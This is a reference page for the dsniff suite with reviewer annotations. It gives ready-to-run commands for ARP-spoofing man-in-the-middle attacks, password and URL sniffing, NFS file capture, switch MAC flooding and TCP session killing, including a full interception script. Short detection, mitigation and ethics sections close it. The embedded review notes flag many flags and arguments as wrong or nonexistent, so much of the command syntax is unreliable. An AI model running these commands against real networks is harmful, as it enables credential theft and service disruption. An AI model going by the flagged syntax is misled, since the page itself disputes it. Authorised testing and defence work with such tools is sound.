
dsniff

dsniff is a collection of powerful network auditing and penetration testing tools designed for password sniffing, traffic interception, and man-in-the-middle (MITM) attacks. The suite includes multiple utilities like dsniff (password sniffer), arpspoof (ARP spoofing), macof (MAC flooding), tcpkill (TCP session killer), urlsnarf (URL sniffing), and filesnarf (file transfer sniffing). These tools are essential for network security testing but require careful ethical use and proper authorization.

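# Install the packaged dsniff suite from the distribution repositories.
# The package manager checks repository signatures for you, which the
# source build further down does not.
sudo apt-get update
sudo apt-get install dsniff
# Confirm the binary is on PATH (command -v is the portable form of `which`).
command -v dsniff
dsniff -h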
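# Build from source.  dsniff-mirror is a third-party mirror, not the upstream
# project: pin a tag or commit and compare the tree against the distribution's
# source package (apt-get source dsniff) before trusting a binary built from it.
git clone https://github.com/dsniff-mirror/dsniff.git
cd dsniff || exit 1   # never run configure/make in whatever directory we happen to be in
./configure
make
sudo make install
dsniff -h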
# Print the usage banner of each remaining tool in the suite, one after the other.
for tool in arpspoof macof tcpkill urlsnarf filesnarf; do
  "$tool" -h
done
| Tool | Purpose |
| --- | --- |
| dsniff | Capture and display passwords from network traffic |
| arpspoof | Spoof ARP packets to redirect traffic |
| macof | Flood network with bogus MAC addresses |
| tcpkill | Kill TCP connections |
| urlsnarf | Capture URLs from HTTP traffic |
| filesnarf | Sniff files from NFS traffic |
# dsniff: passive credential sniffer.  Everything it prints or saves is captured
# credential material -- restrict who can read the output (umask 077 before
# starting it) and handle the files under the engagement's data-handling rules.

# Capture passwords on default interface
sudo dsniff

# Capture on specific interface
sudo dsniff -i eth0

# Verbose output
# NOTE(review): -v is not among the dsniff(8) options I know of -- confirm
# against the installed man page before relying on it.
sudo dsniff -v

# Save to file
# NOTE(review): as far as I know -w writes dsniff's own session savefile (meant
# to be read back with -r), not a plain-text log -- confirm before tailing it.
sudo dsniff -w passwords.log

# Specific protocol
# NOTE(review): in the dsniff(8) I know, -n means "do not resolve hostnames"
# and takes no argument, so "ftp"/"http" would land in the trailing pcap filter
# expression rather than select a protocol -- confirm on the installed version.
sudo dsniff -n ftp
sudo dsniff -n http
# Sniff specific subnet.  The trailing argument is a pcap filter expression,
# the same syntax the tcpkill examples on this page use.
# NOTE(review): confirm libpcap accepts a bare CIDR here without the `net` keyword.
sudo dsniff 10.0.0.0/24

# Multiple protocols
# NOTE(review): see the -n caveat above -- in dsniff(8) as I know it, -n takes
# no argument, so this quoted list would be parsed as a filter expression.
sudo dsniff -n "ftp http telnet pop3"

# High verbosity
# NOTE(review): -v/-vv are not documented dsniff options I know of -- confirm.
sudo dsniff -vv

# Output to pcap file
# NOTE(review): in the dsniff(8) I know, -f names a services file and the
# capture filter is the trailing positional argument; -w writes dsniff's own
# savefile, not a pcap.  Confirm before relying on capture.pcap being a pcap.
sudo dsniff -f filter_expression -w capture.pcap
# arpspoof: poisons the ARP cache of the -t target so that traffic for `host`
# (the last argument) is sent to this machine.  Unless IP forwarding is on
# (sysctl step on this page) that traffic dead-ends here and the target simply
# loses connectivity -- an outage, not an interception.  Run the cleanup block
# on this page afterwards so the caches are restored.

# Spoof ARP between target and gateway
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1

# Spoof bidirectional traffic
# NOTE(review): -T is not an arpspoof(8) option I know of -- confirm.  The
# two-process form in the multi-terminal example on this page is the form
# that is known to cover both directions.
sudo arpspoof -i eth0 -t 10.0.0.100 -T 10.0.0.1 10.0.0.1

# Verbose output
# NOTE(review): -v is not an arpspoof option I know of -- confirm.  More
# importantly this form has no -t: in the arpspoof I know, a missing target
# makes it broadcast the replies, poisoning every host on the segment.  Do not
# run this form without confirming that behaviour.
sudo arpspoof -v 10.0.0.100
# Full interception setup: forwarding on, both directions poisoned, then
# sniff.  Each step blocks, hence one terminal per command.  Afterwards run
# the cleanup block on this page (kill, restore ARP, forwarding off); until
# then both hosts keep sending through this machine until their caches expire.

# Terminal 1: Enable IP forwarding (runtime only; lost at reboot)
sudo sysctl -w net.ipv4.ip_forward=1

# Terminal 2: Spoof target (target's entry for the gateway -> this host)
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1

# Terminal 3: Spoof gateway (gateway's entry for the target -> this host)
sudo arpspoof -i eth0 -t 10.0.0.1 10.0.0.100

# Terminal 4: Sniff traffic (output is credential material -- see umask note
# on the dsniff examples)
sudo dsniff -i eth0
# Spoof specific target only
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# Spoof multiple targets: brace expansion yields three addresses, one
# backgrounded arpspoof each.  "$target" is correctly quoted.
# NOTE(review): a backgrounded sudo cannot read a password from the terminal;
# if sudo needs one here the loop fails silently -- check the jobs started.
for target in 192.168.1.{100,101,102}; do
  sudo arpspoof -i eth0 -t "$target" 192.168.1.1 &
done

# Background process.  Both stdout and stderr are discarded, so a failing
# arpspoof (wrong interface, permission error) goes unnoticed; $! after this
# line is sudo's PID, not arpspoof's.
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1 > /dev/null 2>&1 &
# macof: floods the switch with frames carrying random source MACs.  This
# degrades the switch for everyone attached to it, not just one host; the
# switch-side control is port-security (per-port MAC limits).

# Flood switch with fake MAC addresses
sudo macof -i eth0

# Flood specific subnet
# NOTE(review): in the macof(8) I know, -n is a packet count, not a subnet --
# confirm; this line may be rejected or mean something else.
sudo macof -i eth0 -n 10.0.0.0/24

# Custom delay between packets
# NOTE(review): in the macof(8) I know, -d is the destination IP address, and
# there is no delay option -- confirm.
sudo macof -i eth0 -d 10

# Spoof specific gateway
# NOTE(review): -g is not a macof option I know of -- confirm.
sudo macof -i eth0 -g 10.0.0.1
# macof variants.  Same caveat as above: this is a whole-switch disruption.

# Continuous flooding
# NOTE(review): -c is not a macof(8) option I know of (the count option I know
# is -n) -- confirm against the installed man page.
sudo macof -i eth0 -c 0

# Limited packets
sudo macof -i eth0 -c 1000

# Verbose output
# NOTE(review): -v is not a macof option I know of -- confirm.
sudo macof -v

# With source MAC
# NOTE(review): in the macof(8) I know, -e is the *target* hardware address,
# not the source -- confirm what this line actually sets.
sudo macof -e 00:11:22:33:44:55
# tcpkill: watches for TCP segments matching a pcap filter and injects RSTs to
# tear the connections down.  Service names such as "http" are resolved via
# /etc/services.  Bursts of injected RSTs are a common IDS signature, which is
# the detection side of this technique.

# Kill all HTTP traffic
sudo tcpkill -i eth0 'tcp port http'

# Kill specific connection (every TCP session to or from the host, not one)
sudo tcpkill -i eth0 'tcp and host 10.0.0.100'

# Kill SSH connections from specific IP
sudo tcpkill -i eth0 'tcp and src 10.0.0.100 and port 22'

# Kill HTTPS traffic
sudo tcpkill -i eth0 'tcp port 443'
# Verbose mode
# NOTE(review): -v is not a tcpkill(8) option I know of -- confirm.
sudo tcpkill -v -i eth0 'tcp port ftp'

# Show packets being killed
# NOTE(review): in the tcpkill(8) I know, -n means "do not resolve hostnames";
# the killed connections are printed regardless -- confirm.
sudo tcpkill -n -i eth0 'tcp port http'

# Custom RST packet
# NOTE(review): -s is not a tcpkill option I know of (the only tuning option I
# know is the -d "degree" of RSTs per segment) -- confirm.  No -i here, so the
# default interface is used.
sudo tcpkill -s 10 'tcp port 80'
# urlsnarf: logs every HTTP request URL it sees on the wire, one line per
# request.  The log is a browsing history of other people -- treat it as
# personal data under the engagement's rules.

# Sniff all HTTP URLs
sudo urlsnarf -i eth0

# Sniff from specific subnet
# NOTE(review): in the urlsnarf(8) I know, the first positional argument is a
# URL regex pattern and the pcap expression comes after it -- this CIDR would
# be read as a pattern.  Confirm.
sudo urlsnarf -i eth0 10.0.0.0/24

# Verbose output
# NOTE(review): in the urlsnarf(8) I know, -v inverts the pattern match (as in
# grep -v), it is not a verbosity flag -- confirm.
sudo urlsnarf -v

# Save to file (the redirect is performed by this unprivileged shell, so the
# file is owned by the invoking user; set umask 077 first).
sudo urlsnarf -i eth0 > urls.txt
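# Post-processing of urlsnarf output.  Note that every pipeline here is a
# separate capture; each starts its own urlsnarf.

# Monitor in real-time and filter.
# The original pattern ".pdf\|.doc" used GNU-only \| alternation and unescaped
# dots (any character), so it matched e.g. "xpdf" and "/doc/".  Escape the dot
# and use -E for portable alternation.
sudo urlsnarf -i eth0 | grep -iE '\.(pdf|doc)'

# Extract just domains
# NOTE(review): as far as I know urlsnarf prints Common Log Format lines
# (client, timestamp, "GET http://host/path ..."), so splitting on '/' and
# printing $1 yields the client/timestamp prefix, not the host -- confirm the
# output format and pick the field accordingly.  sort -u replaces sort|uniq.
sudo urlsnarf -i eth0 | awk -F'/' '{print $1}' | sort -u

# Get specific file types
sudo urlsnarf -i eth0 | grep -E "\.(jpg|png|gif|zip)"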
# filesnarf: reassembles files from NFS traffic it observes.  As far as I know
# it writes them into the current working directory, so run it from a dedicated
# directory with a restrictive umask -- the files are other people's data.

# Sniff NFS traffic
sudo filesnarf -i eth0

# Target specific host
# NOTE(review): in the filesnarf(8) I know, the first positional argument is a
# filename pattern, and the pcap expression (e.g. "host ...") comes after it --
# confirm that a bare hostname does what this comment claims.
sudo filesnarf -i eth0 nfs.server.com

# Monitor specific subnet (same positional-argument caveat as above)
sudo filesnarf -i eth0 10.0.0.0/24

# Save files to directory
# NOTE(review): -d is not a filesnarf option I know of -- confirm; if it is
# rejected, cd into the target directory before starting filesnarf instead.
sudo filesnarf -i eth0 -d /tmp/sniffed_files
# Combine with arpspoof for MITM.  arpspoof is backgrounded and keeps running
# after filesnarf is stopped -- kill it (cleanup block on this page) or the
# target stays poisoned.  IP forwarding must already be on, see the sysctl step.
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1 &
sudo filesnarf -i eth0
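# Enable IP forwarding (critical for MITM): without it, traffic that arpspoof
# redirects to this host is dropped and the target simply loses connectivity.
# Runtime setting only; it is lost at reboot.
sudo sysctl -w net.ipv4.ip_forward=1

# Enable IP forwarding permanently.
# Rarely appropriate on a test box: it survives reboots, so the runtime
# "ip_forward=0" in the cleanup block on this page is undone at the next boot
# and the host keeps acting as a router.  If it really is wanted, append the
# line only once -- the original appended a duplicate on every run.
grep -qxF 'net.ipv4.ip_forward=1' /etc/sysctl.conf \
  || echo "net.ipv4.ip_forward=1" | sudo tee -a /etc/sysctl.conf
sudo sysctl -p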
#!/bin/bash
# Starts two arpspoof processes (target<->gateway, one per direction) and
# returns immediately, leaving them running in the background.  It does NOT
# enable IP forwarding (see the sysctl step on this page) and does NOT clean
# up: run the cleanup block on this page (kill, restore ARP, forwarding off)
# when done.  No `set -u`/`set -e` and no argument parsing -- the three
# constants below are the only configuration.
TARGET="10.0.0.100"
GATEWAY="10.0.0.1"
INTERFACE="eth0"

echo "[*] Starting ARP spoofing..."
echo "[*] Spoofing $TARGET and $GATEWAY"

# Spoof target (poison TARGET's cache entry for GATEWAY).
# NOTE(review): a backgrounded sudo cannot prompt for a password; run this
# from a session where sudo is already authenticated.
sudo arpspoof -i "$INTERFACE" -t "$TARGET" "$GATEWAY" &
# $! is the PID of sudo, not of arpspoof; signalling it reaches arpspoof only
# because sudo relays signals to its child (presumably -- verify on this host).
SPOOF1=$!

# Spoof gateway (poison GATEWAY's cache entry for TARGET).
sudo arpspoof -i "$INTERFACE" -t "$GATEWAY" "$TARGET" &
SPOOF2=$!

echo "[+] ARP spoofing processes: $SPOOF1 $SPOOF2"
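# Run the three sniffers concurrently on one interface.  All of their output is
# captured credential/URL/file material: tighten the umask first so the files
# created by this shell are not world-readable, and keep them inside the
# engagement's evidence-handling rules.
umask 077
sudo dsniff -i eth0 -w dsniff.log &
sudo urlsnarf -i eth0 > urls.log &   # redirect is performed by this (unprivileged) shell
sudo filesnarf -i eth0 &

# Monitor in real-time.  `tail -f` blocks, so two separate tail commands would
# never reach the second file; follow both in one invocation.  -F (follow by
# name, retry) copes with the files not existing yet when tail starts.
# NOTE(review): as far as I know dsniff -w writes dsniff's own savefile format
# (read back with -r), so dsniff.log may not be readable as text -- confirm.
tail -F dsniff.log urls.log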
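# Tear-down: stop the spoofers, put the two hosts' ARP caches right again, and
# only then stop forwarding.  In the original order (forwarding off before the
# re-ARP) the target's traffic is black-holed on this host for as long as its
# cache still points here.
# These values are session-local: they must match what the spoofing script used.
TARGET="10.0.0.100"
GATEWAY="10.0.0.1"

# Kill all background processes.  They were started under sudo (root-owned), so
# an unprivileged killall cannot signal them -- it needs sudo too.
sudo killall arpspoof dsniff urlsnarf filesnarf tcpkill

# Send ARP announcements to restore routing
# NOTE(review): in the arpspoof(8) I know, -c takes own|host|both (which MAC to
# advertise when restoring) rather than a count, and only one positional host
# is accepted (the -t form used elsewhere on this page) -- confirm the
# installed version accepts these two lines.  Also check whether it already
# re-ARPs on SIGTERM, in which case this step is belt-and-braces.
sudo arpspoof -i eth0 -c 5 "$TARGET" "$GATEWAY"
sudo arpspoof -i eth0 -c 5 "$GATEWAY" "$TARGET"

# Disable IP forwarding (this host stops acting as a router)
sudo sysctl -w net.ipv4.ip_forward=0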
# Capture all traffic to a subnet.  The pcap contains everything on the wire,
# credentials included -- store it with the same care as the dsniff logs.
sudo tcpdump -i eth0 -n -w network_capture.pcap net 10.0.0.0/24

# Analyze with dsniff
# NOTE(review): this line does not read the pcap just written; it sniffs live.
# The dsniff(8) I know reads a capture file with -p, and its -f names a
# services file (the pcap filter is the trailing positional argument) -- confirm.
sudo dsniff -f 'not port 22' -w sensitive.log

# Monitor multiple protocols
# NOTE(review): see the -n caveat on the dsniff examples; in dsniff(8) as I know
# it -n takes no argument.
sudo dsniff -n "http ftp telnet pop3 imap"
# Protocol-specific captures.  arpspoof is backgrounded and survives Ctrl-C on
# dsniff -- kill it afterwards (cleanup block on this page).
# NOTE(review): in the dsniff(8) I know, -n means "do not resolve hostnames"
# and takes no argument; "ftp"/"http"/"smtp" would be parsed as the pcap
# filter expression, not as a protocol selector -- confirm.

# FTP capture with arpspoof
sudo arpspoof -i eth0 -t 10.0.0.100 10.0.0.1 &
sudo dsniff -i eth0 -n ftp

# HTTP authentication sniffing
sudo dsniff -i eth0 -n http

# SMTP credential capture
sudo dsniff -i eth0 -n smtp
# tcpkill use cases.  All of these are disruptive to live sessions of other
# users; scope the filter as narrowly as the test allows.

# Kill all SSH connections
sudo tcpkill -i eth0 'tcp port 22'

# Kill web traffic from specific IP
sudo tcpkill -i eth0 'host 10.0.0.100 and tcp port 80'

# Disconnect user from network
# NOTE(review): tcpkill only resets TCP sessions; UDP/ICMP are untouched and
# the host reconnects freely, so "disconnect from network" overstates it.
sudo tcpkill -i eth0 'src 10.0.0.100'
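# urlsnarf post-processing.  Each line is its own capture session, and the
# output is other people's browsing history -- handle as personal data.

# Monitor and log all HTTP traffic (tee shows it live and keeps a copy)
sudo urlsnarf -i eth0 | tee http_log.txt

# Real-time URL filtering.
# The original used GNU-only "\|" alternation inside a basic regex; -E with a
# plain "|" is the portable form and matches the style of the line below.
sudo urlsnarf -i eth0 | grep -vE 'google|facebook|twitter'

# Extract sensitive URLs
sudo urlsnarf -i eth0 | grep -E "login|password|admin"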
# Detection side: spotting ARP poisoning from a host on the segment.

# Monitor for ARP inconsistencies.  arpwatch keeps a database of IP<->MAC
# pairings and reports changes ("changed ethernet address", "flip flop"),
# which is exactly what arpspoof produces.  Best run on a dedicated monitor
# port or span port, not on the box under test.
sudo arpwatch -i eth0

# Manual ARP inspection: two IPs sharing one MAC (typically the gateway and a
# workstation) is the tell-tale.  `ip neigh show` is the modern equivalent.
arp -a

# Check for duplicate IPs (arp-scan flags a second reply for the same IP as DUP)
arp-scan --localnet
# Use random MAC addresses
# The printf builds three random octets behind a fixed 00:11:22 prefix; the
# arithmetic expansions are not quoted but cannot contain whitespace.  See the
# macof -e caveat above (in the macof(8) I know, -e is the target address).
sudo macof -e 00:11:22:$(printf '%02x:%02x:%02x' $((RANDOM%256)) $((RANDOM%256)) $((RANDOM%256)))

# Slow down ARP spoofing
# NOTE(review): -d is not an arpspoof(8) option I know of -- confirm.  "target"
# and "gateway" are placeholders.
sudo arpspoof -i eth0 -d -t target gateway
  • Only use on networks you own or have explicit written permission to test
  • Inform network administrators before testing
  • Document all testing activities
  • Respect privacy and data protection laws
  • Never capture or use credentials maliciously
  • Follow responsible disclosure practices
# Protect against ARP spoofing
# NOTE(review): a route entry does not protect against ARP spoofing -- the
# kernel still resolves 10.0.0.1 via ARP, so a poisoned cache still wins.  This
# line merely pins the route to eth0; only the static ARP entry below pins the MAC.
sudo ip route add 10.0.0.1 dev eth0

# Static ARP entries: host-side mitigation.  Only this host is protected, and
# the entry must be updated by hand when the gateway's NIC changes.
# Modern equivalent: ip neigh add 10.0.0.1 lladdr 00:11:22:33:44:55 dev eth0 nud permanent
sudo arp -s 10.0.0.1 00:11:22:33:44:55

# DHCP snooping and DAI (Dynamic ARP Inspection)
# Configure on managed switches -- the network-side control.  DAI drops ARP
# replies that disagree with the DHCP-snooping binding table, covering every
# port in the VLAN at once; port-security MAC limits are the matching control
# against macof-style flooding.
# Verify interface is in promiscuous mode (look for PROMISC in the flag list)
ip link show eth0

# Set promiscuous mode.  Revert with `promisc off` after testing; a NIC left in
# promiscuous mode is itself something host-based monitoring alerts on.
sudo ip link set eth0 promisc on

# Check IP forwarding is enabled (1 = on, 0 = off)
cat /proc/sys/net/ipv4/ip_forward

# Verify ARP spoofing is working
# NOTE(review): "incomplete" entries are unresolved neighbours, not evidence of
# poisoning.  The observable effect on the *target* is the gateway IP showing
# this host's MAC -- confirm what this check was meant to show.
arp -a | grep -i "incomplete"
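# Basic troubleshooting when spoofing or sniffing shows nothing.
# target_ip / gateway_ip / target / gateway are placeholders for the hosts under test.

# Check network connectivity (bounded: Linux ping runs forever without -c)
ping -c 3 target_ip
ping -c 3 gateway_ip

# Verify correct interface.  ip(8) replaces the deprecated ifconfig and is what
# the rest of this page already uses.
ip addr show

# Check firewall rules.  -n skips reverse DNS (which stalls on an isolated lab
# network), -v adds interfaces and counters; the FORWARD chain is the one that
# applies to traffic passing through this host.
sudo iptables -L -n -v

# Test with verbose mode
# NOTE(review): -v is not an arpspoof(8) option I know of -- confirm.
sudo arpspoof -v -i eth0 -t target gateway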
  • Always have explicit authorization before testing
  • Use in isolated lab environments when possible
  • Maintain detailed logs of all activities
  • Clean up and restore network state after testing
  • Use strong passwords to prevent credential theft
  • Monitor your own networks for suspicious activity
  • Implement network security controls
  • Consider using encrypted protocols (SSH, HTTPS, etc.)
  • Use intrusion detection systems to monitor for attacks
  • Keep systems updated and patched